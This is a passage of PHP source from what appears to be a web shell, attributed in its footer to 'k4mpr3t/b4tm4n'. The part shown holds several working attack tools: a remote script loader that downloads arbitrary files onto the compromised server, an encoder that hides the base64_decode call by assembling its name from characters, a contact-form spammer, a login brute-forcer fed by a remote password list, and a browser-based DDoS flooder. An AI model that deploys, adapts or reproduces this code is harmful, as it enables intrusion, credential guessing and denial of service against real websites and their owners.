3314 fclose($conn);
3315 }
3316 }
3317 break;
3318 }
3319 print "<br>Scan Finish.";
3320 exit;
3321 }
3322 }
3323 if($z=="script-loader")
3324 {
3325 print "<div class='tools-header'>
3326 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3327 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3328 </div>";
3329
3330 $path=dirname(__FILE__)._.'script-loader';
3331 if(!is_dir($path)) mkdir($path,0755);
3332
3333 $recur=new RecursiveIteratorIterator(
3334 new RecursiveDirectoryIterator($path),
3335 RecursiveIteratorIterator::LEAVES_ONLY
3336 );
3337
3338 $result="";
3339 foreach ($recur as $key => $val)
3340 {
3341 if(basename($key)!=".."&&basename($key)!=".")
3342 {
3343 $result.=sprintf("<tr>
3344 <td></td>
3345 <td><a href='%s' target='_blank'>%s</a></td>
3346 <td><center>%s</center></td>
3347 </tr>",
3348 GetUrlFromPath(realpath($key)),
3349 basename(realpath($key)),
3350 GetFileTime(realpath($key),'modify')
3351 );
3352 }
3353 }
3354
3355 printf("<div id='script-loader'>
3356 <div class='divide'>
3357 <div class='divide-left'>
3358 <form onsubmit='return false;' class='new'>
3359 <label>Url</label><input type='text' id='url-source' value=''/><br>
3360 <label>Filename</label><input type='text' id='file-name' value=''/><br>
3361 <input type='submit' onclick=\"return getAjax(true,'download-result','POST','?z=script-loader&url='+document.getElementById('url-source').value+'&filename='+document.getElementById('file-name').value);\"/><br>
3362 <div id='download-result' class='result'></div>
3363 </form>
3364 </div>
3365 <div class='divide-right'>
3366 <fieldset>
3367 <legend>List's</legend>
3368 <div class='auto-number'>
3369 <table class='table'>
3370 <thead><tr><th>No.</th><th>Name</th><th>Modified</th>
3371 <tbody>%s</tbody>
3372 </table>
3373 </div>
3374 </fieldset>
3375 </div>
3376 </div>
3377 </div>",$result);
3378
3379 if(any("url",$_REQUEST)&&any("filename",$_REQUEST))
3380 {
3381 ob_clean();
3382 $url=$_REQUEST['url'];
3383 $filename=$_REQUEST['filename'];
3384 $dest=rtrim($path,_)._.$filename;
3385 if(GetUrlExists($url)&&!empty($filename))
3386 {
3387 if(GetDownloadUrl($url,$dest))
3388 {
3389 $url=GetUrlFromPath($dest);
3390 printf("Success -> <a href='$url' target='_blank'><u>Link</u></a>");
3391 }
3392 else
3393 {
3394 print "<br>Failed";
3395 }
3396 print "<br>Finish";
3397 }
3398 else
3399 {
3400 print "<br>Mistakes";
3401 }
3402 exit;
3403 }
3404 }
3405 if($z=="encryptor")
3406 {
3407 print "<div class='tools-header'>
3408 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3409 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3410 </div>";
3411
3412 printf("<div id='script-loader'>
3413 <form onsubmit='return false;' class='new'>
3414 <div class='hash-control'>
3415 <div class='hash'>
3416 <input type='radio' name='encr' value='basic' checked><label>Basic</label>
3417 <select id='basic-hash'>
3418 <option value='md5'>Md5</option>
3419 <option value='asc'>Char</option>
3420 <option value='chr'>Ascii</option>
3421 <option value='sha1'>Sha1</option>
3422 <option value='crc32'>Crc32</option>
3423 <option value='B64E'>B64E</option>
3424 <option value='B64D'>B64D</option>
3425 <option value='urlencode'>URL Encode</option>
3426 <option value='urldecode'>URL Decode</option>
3427 <option value='strlen'>String Length</option>
3428 <option value='strrev'>String Reverse</option>
3429 <option value='base64_encode'>Base64 Encode</option>
3430 <option value='base64_decode'>Base64 Decode</option>
3431 <option value='entties'>Htmlentities</option>
3432 <option value='spechar'>Htmlspecialchars</option>
3433 </select>
3434 </div>
3435 <div class='hash'>
3436 <input type='radio' name='encr' value='extra'><label>Extra</label>
3437 <select id='extra-hash'>
3438 <option value='asc-hex'>Ascii => Hex</option>
3439 <option value='asc-bin'>Ascii => Binary</option>
3440 <option value='hex-asc'>Hex => Ascii</option>
3441 <option value='hex-bin'>Hex => Binary</option>
3442 <option value='bin-asc'>Binary => Ascii</option>
3443 <option value='bin-hex'>Binary => Hex</option>
3444 </select>
3445 </div>
3446 <div class='hash'>
3447 <input type='radio' name='encr' value='crypt'><label>Crypt</label>
3448 <input type='text' id='crypt-salt' name='salt' placeholder='\$alt'/>
3449 </div>
3450 <div class='hash'>
3451 <input type='radio' name='encr' value='hash'><label>Hash</label>
3452 <select id='hash-hash'><option value='md2'>md2</option><option value='md4'>md4</option><option value='md5'>md5</option><option value='sha1'>sha1</option><option value='sha256'>sha256</option><option value='sha384'>sha384</option><option value='sha512'>sha512</option><option value='ripemd128'>ripemd128</option><option value='ripemd160'>ripemd160</option><option value='ripemd256'>ripemd256</option><option value='ripemd320'>ripemd320</option><option value='whirlpool'>whirlpool</option><option value='tiger128,3'>tiger128,3</option><option value='tiger160,3'>tiger160,3</option><option value='tiger192,3'>tiger192,3</option><option value='tiger128,4'>tiger128,4</option><option value='tiger160,4'>tiger160,4</option><option value='tiger192,4'>tiger192,4</option><option value='snefru'>snefru</option><option value='gost'>gost</option><option value='adler32'>adler32</option><option value='crc32'>crc32</option><option value='crc32b'>crc32b</option><option value='haval128,3'>haval128,3</option><option value='haval160,3'>haval160,3</option><option value='haval192,3'>haval192,3</option><option value='haval224,3'>haval224,3</option><option value='haval256,3'>haval256,3</option><option value='haval128,4'>haval128,4</option><option value='haval160,4'>haval160,4</option><option value='haval192,4'>haval192,4</option><option value='haval224,4'>haval224,4</option><option value='haval256,4'>haval256,4</option><option value='haval128,5'>haval128,5</option><option value='haval160,5'>haval160,5</option><option value='haval192,5'>haval192,5</option><option value='haval224,5'>haval224,5</option><option value='haval256,5'>haval256,5</option></select>
3453 <input type='checkbox' id='hash-raw'/> Raw
3454 </div>
3455 <div class='hash'>
3456 <input type='submit' onclick=\"
3457 url='';
3458 textencode=window.btoa(document.getElementById('hashtext').value);
3459 radios=document.getElementsByName('encr');
3460 for(var i=0,length=radios.length;i<length;i++){
3461 if (radios[i].checked){
3462 switch(radios[i].value){
3463 case 'basic':
3464 url='?z=encryptor&opt=basic&hash='+document.getElementById('basic-hash').value+'&text-encode='+textencode;
3465 break;
3466 case 'extra':
3467 url='?z=encryptor&opt=extra&hash='+document.getElementById('extra-hash').value+'&text-encode='+textencode;
3468 break;
3469 case 'crypt':
3470 url='?z=encryptor&opt=crypt&salt='+document.getElementById('crypt-salt').value+'&text-encode='+textencode;
3471 break;
3472 case 'hash':
3473 url='?z=encryptor&opt=hash&hash='+document.getElementById('hash-hash').value+'&raw='+document.getElementById('hash-raw').checked+'&text-encode='+textencode;
3474 break;
3475 }
3476 break;
3477 }
3478 }
3479 return getAjax(false,'hashresult','POST',url);
3480 \"/>
3481 <input type='submit' onclick=\"
3482 tempi=document.getElementById('hashresult').value;
3483 tempi1=document.getElementById('hashtext').value;
3484 document.getElementById('hashtext').value=tempi.trim();
3485 document.getElementById('hashresult').value=tempi1.trim();
3486 \" value='Swap'/>
3487 </div>
3488 </div>
3489 <div class='hash-capture'>
3490 <div class='hash-capture-left'>
3491 <label>String</label><textarea id='hashtext'></textarea>
3492 <input type='submit' onclick=\"
3493 document.getElementById('hashtext').value='';
3494 \" value='Clear'/>
3495 </div>
3496 <div class='hash-capture-right'>
3497 <label>Result</label><textarea id='hashresult'></textarea>
3498 <input type='submit' onclick=\"
3499 document.getElementById('hashresult').value='';
3500 \" value='Clear'/>
3501 </div>
3502 </div>
3503 </form>
3504 </div>");
3505
3506 function chr_asc($str){
3507 $asc='';
3508 for($i=0;$i<strlen($str);$i++)
3509 $asc.=ord($str{$i}).' ';
3510 return rtrim($asc);
3511 }
3512
3513 function asc_chr($asc){
3514 $str='';
3515 if (strpos($asc,' ')){
3516 $exps=explode(' ',$asc);
3517 foreach($exps as $exp)
3518 $str.=chr($exp);
3519 }else{
3520 $str=chr($asc);
3521 }
3522 return $str;
3523 }
3524
3525 function asc_hex($asc){
3526 $hex='';
3527 for ($i=0;$i<strlen($asc);$i++)
3528 $hex.=sprintf("%02x",ord(substr($asc,$i,1)));
3529 return $hex;
3530 }
3531
3532 function hex_asc($hex){
3533 $asc='';
3534 for ($i=0;$i<strlen($hex);$i+=2)
3535 $asc.=chr(hexdec(substr($hex,$i,2)));
3536 return $asc;
3537 }
3538
3539 function hex_bin($hex){
3540 $bin='';
3541 for($i=0;$i<strlen($hex);$i++)
3542 $bin.=str_pad(decbin(hexdec($hex{$i})),4,'0',STR_PAD_LEFT);
3543 return $bin;
3544 }
3545
3546 function bin_hex($bin){
3547 $hex='';
3548 for($i=strlen($bin)-4;$i>=0;$i-=4)
3549 $hex.=dechex(bindec(substr($bin,$i,4)));
3550 return strrev($hex);
3551 }
3552
3553 function asc_bin($asc){
3554 $hex=asc_hex($asc);
3555 return hex_bin($hex);
3556 }
3557
3558 function bin_asc($bin){
3559 $hex=bin_hex($bin);
3560 return hex_asc($hex);
3561 }
3562
3563 if(any("opt",$_REQUEST))
3564 {
3565 ob_clean();
3566 $opt=$_REQUEST['opt'];
3567 $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
3568 $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
3569 $b64e=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
3570 $b64d=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_l.$_m.$_j.$_k.$_l.$_m;
3571 $text=$b64d($_POST['text-encode']);
3572 if ($opt=='basic')
3573 {
3574 $hash=$_REQUEST['hash'];
3575 switch($hash)
3576 {
3577 case "md5":print md5($text);break;
3578 case "sha1":print sha1($text);break;
3579 case "chr":print asc_chr($text);break;
3580 case "asc":print chr_asc($text);break;
3581 case "crc32":print crc32($text);break;
3582 case "strlen":print strlen($text);break;
3583 case "strrev":print strrev($text);break;
3584 case "urlencode":print urlencode($text);break;
3585 case "urldecode":print urldecode($text);break;
3586 case "entties":print htmlentities($text);break;
3587 case "spechar":print htmlspecialchars($text);break;
3588 case "base64_encode":print $b64e($text);break;
3589 case "base64_decode":print $b64d($text);break;
3590 case "B64E":print B64E($text);break;
3591 case "B64D":print B64D($text);break;
3592 }
3593 }
3594 elseif($opt=='extra')
3595 {
3596 $hash=$_REQUEST['hash'];
3597 switch($hash)
3598 {
3599 case "chr-asc":print str_asc($text);break;
3600 case "asc-chr":print asc_str($text);break;
3601 case "asc-hex":print asc_hex($text);break;
3602 case "hex-asc":print hex_asc($text);break;
3603 case "hex-bin":print hex_bin($text);break;
3604 case "bin-hex":print bin_hex($text);break;
3605 case "asc-bin":print asc_bin($text);break;
3606 case "bin-asc":print bin_asc($text);break;
3607 }
3608 }
3609 elseif($opt=='crypt')
3610 {
3611 $salt=$_REQUEST['salt'];
3612 print crypt($text,$salt);
3613 }
3614 elseif($opt=='hash')
3615 {
3616 $hash=$_REQUEST['hash'];
3617 $raw=$_REQUEST['raw'];
3618 if($raw==true)
3619 {
3620 print hash($hash,$text,true);
3621 }
3622 else
3623 {
3624 print hash($hash,$text);
3625 }
3626 }
3627 exit;
3628 }
3629 }
3630 if($z=="form-bruteforces")
3631 {
3632 print "<div class='tools-header'>
3633 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3634 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3635 </div>";
3636
3637 $exp=array(
3638 '{',
3639 '"name":"Handsome",',
3640 '"email":"very@handsome.com",',
3641 '"subject":"WHOOPS YOU GOT E-MAIL ?!",',
3642 '"message":"HA HA HA HA HA HA HA HA",',
3643 '}');
3644
3645 printf("<div class='divide'>
3646 <div class='divide-left'>
3647 <form onsubmit='return false;' class='new'>
3648 <label>Url Action</label><input type='text' id='form-url' placeholder='http://'/><br>
3649 <label>Count's</label><input type='number' id='form-count' value='100' min='10' autocomplete='off'/><br>
3650 <label>Parameter (JSON)</label>
3651 <textarea id='form-parameter'>%s</textarea>
3652 <input type='submit' onclick=\"return ajaxAbort(true,'form-result')\" value=Cancel />
3653 <input type='submit' value='Attack' onclick=\"return getAjax(true,'form-result','POST','?z=form-bruteforces&url='+document.getElementById('form-url').value+'¶meter='+document.getElementById('form-parameter').value+'&count='+document.getElementById('form-count').value);\"/><br>
3654 </form>
3655 </div>
3656 <div class='divide-right'>
3657 <fieldset>
3658 <legend>Result's</legend>
3659 <div id='form-result' class='result'></div>
3660 </fieldset>
3661 </div>
3662 </div>",implode($exp,"\n"));
3663
3664 if(any("url",$_REQUEST)&&any("parameter",$_REQUEST))
3665 {
3666 ob_clean();
3667 $start=$succ=$fail=0;
3668 $url=$_REQUEST['url'];
3669 $count=$_REQUEST['count'];
3670 $parameter=$_REQUEST['parameter'];
3671 $content=json_decode($parameter,true);
3672 if(!is_array($content))$content=array();
3673 do {$start++;
3674 $ch=curl_init();
3675 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
3676 curl_setopt($ch,CURLOPT_URL,$url);
3677 curl_setopt($ch,CURLOPT_POST,1);
3678 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
3679 curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($content));
3680 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3681 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
3682 $result=curl_exec($ch);
3683 $httpcode=curl_getinfo($ch,CURLINFO_HTTP_CODE);
3684 if(curl_error($ch)) echo curl_error($ch);
3685 curl_close($ch);
3686 if($httpcode==200)
3687 {
3688 $succ++;
3689 }
3690 else
3691 {
3692 $fail++;
3693 }
3694 if($start==$count)
3695 {
3696 echo "Success: $succ<br>Failed: $fail<br>Messages: ".htmlspecialchars($result);
3697 }
3698 }while($start<=$count);
3699 exit;
3700 }
3701 }
3702 if($z=="login-bruteforces")
3703 {
3704 print "<div class='tools-header'>
3705 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3706 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3707 </div>";
3708
3709 printf("<div id='login-bruteforces'>
3710 <div class='divide-left'>
3711 <form onsubmit='return false;' class='new'>
3712 <label>Url Action</label><input type='text' id='login-url' placeholder='http://'/><br>
3713 <label>User List</label><input type='text' id='login-user' placeholder='admin' value='admin'/><br>
3714 <label> </label><input type='text' id='login-username' placeholder='User Fieldname'/><br>
3715 <label>Pass List</label><input type='text' id='login-passlist' placeholder='http://'/><br>
3716 <label> </label><input type='text' id='login-passname' placeholder='Pass Fieldname'/><br>
3717 <input type='submit' onclick=\"return getAjax(true,'login-result','POST',
3718 '?z=login-bruteforces'+
3719 '&url='+document.getElementById('login-url').value+
3720 '&user='+document.getElementById('login-user').value+
3721 '&userfield='+document.getElementById('login-username').value+
3722 '&passfield='+document.getElementById('login-passname').value+
3723 '&passlist='+document.getElementById('login-passlist').value);\"/><br>
3724 </form>
3725 </div>
3726 <div class='divide-right'>
3727 <fieldset>
3728 <legend>Result's</legend>
3729 <div id='login-result' class='result'></div>
3730 </fieldset>
3731 </div>
3732 </div>");
3733
3734 if(any("url",$_REQUEST)&&any("user",$_REQUEST))
3735 {
3736 ob_clean();
3737 $url=$_REQUEST['url'];
3738 $user=$_REQUEST['user'];
3739 $file=GetUrlExists($_REQUEST['passlist'])?
3740 GetUrlContent($_REQUEST['passlist']):
3741 $_REQUEST['passlist'];
3742 $words=explode("\n",$file);
3743 $length=count($words);
3744 foreach ($words as $index => $word)
3745 {
3746 $parameter=http_build_query(
3747 array(
3748 $_REQUEST['userfield'] => $user,
3749 $_REQUEST['passfield'] => $word,
3750 'Submit' => 'Submit',
3751 )
3752 );
3753 $ch=curl_init();
3754 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
3755 curl_setopt($ch,CURLOPT_URL,$url);
3756 curl_setopt($ch,CURLOPT_POST,1);
3757 curl_setopt($ch,CURLOPT_TIMEOUT,5);
3758 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
3759 curl_setopt($ch,CURLOPT_POSTFIELDS,$parameter);
3760 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3761 $ra=curl_exec($ch);
3762 $st=curl_getinfo($ch,CURLINFO_HTTP_CODE);
3763 if(curl_error($ch)) echo curl_error($ch);
3764 curl_close($ch);
3765 if ($st==200)
3766 {
3767 echo "FOUND'S: $user:$word<br>";
3768 exit;
3769 }
3770 else
3771 {
3772 echo htmlspecialchars($ra);
3773 }
3774 }
3775 exit;
3776 }
3777 }
3778 if($z=="mass-tools")
3779 {
3780 print "<div class='tools-header'>
3781 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3782 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3783 </div>";
3784
3785 print "Coming Soon";
3786 }
3787 if($z=="ddos-attack")
3788 {
3789 print "<div class='tools-header'>
3790 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3791 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3792 </div>";
3793
3794 printf('<script type="text/javascript">
3795
3796 window.onload=function(){
3797
3798 startTime();
3799
3800 var interval;
3801 var xhttp;
3802
3803 var requestsNode=document.getElementById("requests"),
3804 successNode=document.getElementById("success"),
3805 proccessNode=document.getElementById("proccess"),
3806 targetNode=document.getElementById("target"),
3807 attack=document.getElementById("attack"),
3808 method=document.getElementById("method"),
3809 size=document.getElementById("size"),
3810 time=document.getElementById("time"),
3811 stamp=document.getElementById("stamp")
3812 uagent=document.getElementById("uagent")
3813 referer=document.getElementById("referer")
3814 origin=document.getElementById("origin")
3815
3816 var requests=0,
3817 succeeded=0,
3818 proccess=0;
3819
3820 var makeHttpRequest=function(){
3821 var data=new FormData();
3822 var buff=new ArrayBuffer(65536);
3823 var xhrx=new XMLHttpRequest();
3824 var agent =["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
3825 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
3826 "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
3827 "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
3828 "Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
3829 "Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
3830 "Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
3831 "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
3832 "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
3833 "Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"];
3834 randomize=function(arr){
3835 rand=Math.floor((Math.random()*arr.length));
3836 return arr[rand];}
3837 xhrx.open(method.value,targetNode.value,true);
3838 if (uagent.checked) xhrx.setRequestHeader("user-agent",randomize(agent));
3839 if (referer.checked) xhrx.setRequestHeader("referer",targetNode.value);
3840 if (origin.checked) xhrx.setRequestHeader("origin","*");
3841 xhrx.onreadystatechange=function(){
3842 if(xhrx.readyState==XMLHttpRequest.DONE){
3843 if(xhrx.status>=500){
3844 onSuccess();
3845 }
3846 onProcess();
3847 }
3848 onRequest();
3849 }
3850 xhttp=xhrx;
3851 attack=function(){
3852 str="";arr=new Uint32Array(buff);
3853 window.crypto.getRandomValues(arr);
3854 for(var i=0;i<arr.length;i++){
3855 str+=String.fromCharCode(arr[i]);
3856 }return str;}
3857 what=attack();
3858 for(var j=0;j<size.value;j++){
3859 data.append(what, stamp.value);}
3860 xhrx.send(data);
3861 };
3862
3863 var onRequest=function(){
3864 requests++;
3865 requestsNode.innerHTML=requests;
3866 };
3867
3868 var onProcess=function(){
3869 proccess++;
3870 proccessNode.innerHTML=proccess;
3871 };
3872
3873 var onSuccess=function(){
3874 success++;
3875 successNode.innerHTML=success;
3876 };
3877
3878 attack.onclick=function(){
3879 var today=new Date();
3880 var h=today.getHours();
3881 var m=today.getMinutes();
3882 var s=today.getSeconds();
3883 m=m<10?"0"+m:m;
3884 s=s<10?"0"+s:s;
3885 if(this.value==\'Start\'){
3886 this.value="Stop";
3887 requests=0;
3888 succeeded=0;
3889 proccess=0;
3890 document.getElementById("start").innerHTML="00:00:00";
3891 document.getElementById("finish").innerHTML="00:00:00";
3892 interval=setInterval(makeHttpRequest,(parseInt(time.value)));
3893 document.getElementById("start").innerHTML=h+":"+m+":"+s;
3894 }else if(this.value==\'Stop\'){
3895 this.value="Start";
3896 xhttp.abort();
3897 clearInterval(interval);
3898 document.getElementById("finish").innerHTML=h+":"+m+":"+s;
3899 }
3900 };
3901
3902 function startTime(){
3903 var today=new Date();
3904 var h=today.getHours();
3905 var m=today.getMinutes();
3906 var s=today.getSeconds();
3907 m=m<10?"0"+m:m;
3908 s=s<10?"0"+s:s;
3909 document.getElementById("times").innerHTML=h+":"+m+":"+s;
3910 var t=setTimeout(startTime,500);
3911 }
3912 }
3913 </script>
3914 <form onsubmit="return false;" class="new">
3915 <label>Target</label><input type="text" id="target" value="http://www.target.com"><br>
3916 <label>Stamp</label><input type="text" id="stamp" value="DDOS ATTACK !!!"><br>
3917 <label>Method</label><select id="method">
3918 <option value="PUT">PUT</option>
3919 <option value="GET">GET</option>
3920 <option value="POST">POST</option>
3921 <option value="HEAD">HEAD</option>
3922 <option value="TRACE">TRACE</option>
3923 <option value="PATCH">PATCH</option>
3924 <option value="OPTIONS">GET</option>
3925 <option value="DELETE">DELETE</option>
3926 <option value="CONNECT">CONNECT</option>
3927 <option value="OPTIONS">OPTIONS</option>
3928 </select><br>
3929 <label>Size (kB)</label><input type="number" id="size" value="1024"><br>
3930 <label>Time (ms)</label><input type="number" id="time" value="500"><br>
3931 <label>Options</label>
3932 <input type="checkbox" id="uagent" name="uagent" style="vertical-align:middle"> User Agent
3933 <input type="checkbox" id="referer" name="referer" style="vertical-align:middle"> Referer Target
3934 <input type="checkbox" id="origin" name="origin" style="vertical-align:middle"> Origin<br>
3935 <label style="margin:5px 0px 5px">
3936 Time <span id="times">00:00:00</span> |
3937 Start <span id="start">00:00:00</span> |
3938 Finish <span id="finish">00:00:00</span>
3939 </label><br>
3940 <label style="margin:0px 0px 5px">
3941 Requests <span id="requests">0</span> |
3942 Proccess <span id="proccess">0</span> |
3943 Success <span id="success">0</span>
3944 </label><br>
3945 <input type="submit" id="attack" value="Start"/>
3946 </form>');
3947 }
3948
3949 print "</div>";
3950}
3951/* END CUSTOM TOOLZ */
3952
3953printf("</div><!-- content -->
3954 </div><!-- container -->
3955 <div id='footer'>
3956 <div id='copyrights'><a href='//github.com/k4mpr3t/b4tm4n'>k4mpr3t</a> © %s</div>
3957 <div id='pageload'>Page Loaded in %s Seconds</div>
3958 </div>
3959 </body>
3960 </html>",date('Y'),round((microtime(true)-$start),2)
3961);
3962
3963}?>